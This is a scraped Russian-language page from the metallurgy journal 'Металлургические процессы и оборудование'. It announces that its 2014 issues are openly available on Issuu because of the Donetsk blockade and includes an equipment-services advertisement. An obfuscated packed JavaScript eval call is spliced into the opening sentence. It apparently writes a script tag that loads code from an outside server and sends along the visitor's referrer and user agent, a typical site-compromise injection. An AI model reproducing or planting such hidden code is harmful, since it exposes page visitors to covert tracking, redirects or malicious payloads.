

Продолжающаяся `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String))){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|darii|var|u0026u|referrer|ebkhn||js|php'.split('|'),0, {}))` блокада Донецка со стороны Украины, не позволяет редакции журнала "Металлургические процессы и оборудование" выполнять полноценно свои обязательства перед своими подписчиками, читателями и авторами статей. В связи с этим, редакция журнала приняла решение о размещении всех журналов 2014 года в открытом доступе на платформе - Issuu.com

metal.donntu.edu.ua ISSN 1816-1200

МЕТАЛЛУРГИЧЕСКИЕ ПРОЦЕССЫ И ОБОРУДОВАНИЕ

№ 3(37) Сентябрь 2014



БИЛАНСИРОВАКА • АНАЛИЗ МАСЕЛ • КОНТРОЛЬ ГЕОМЕТРИИ • ИНСТРУМЕНТ • ПРОВЕРКА ПОДШИПНИКОВ • КОНТРОЛЬ ТЕМПЕРАТУРЫ • ВИБРОДИАГНОСТИКА • ЦЕНТРОКА

BALTECH
RELIABILITY TECHNOLOGIES



ОБУЧЕНИЕ ТЕХНИЧЕСКИХ СПЕЦИАЛИСТОВ

ТЕХНИЧЕСКИЙ АУДИТ ПРЕДПРИЯТИЙ

ИННОВАЦИОННЫЕ ИНДУСТРИАЛЬНЫЕ РЕШЕНИЯ

ТЕХНОЛОГИИ НАДЕЖНОСТИ

+7 (812) 335-00-85 +380 (44) 392-80-74

WWW.BALTECH.COM.UA

ИОРС 2020

Автор: Sotnikoff
28.07.2015 17:33

Скачивание документов осуществляется с сервера www.metproc.ru с использованием IP-адресов указанных в файле [ip.txt](#)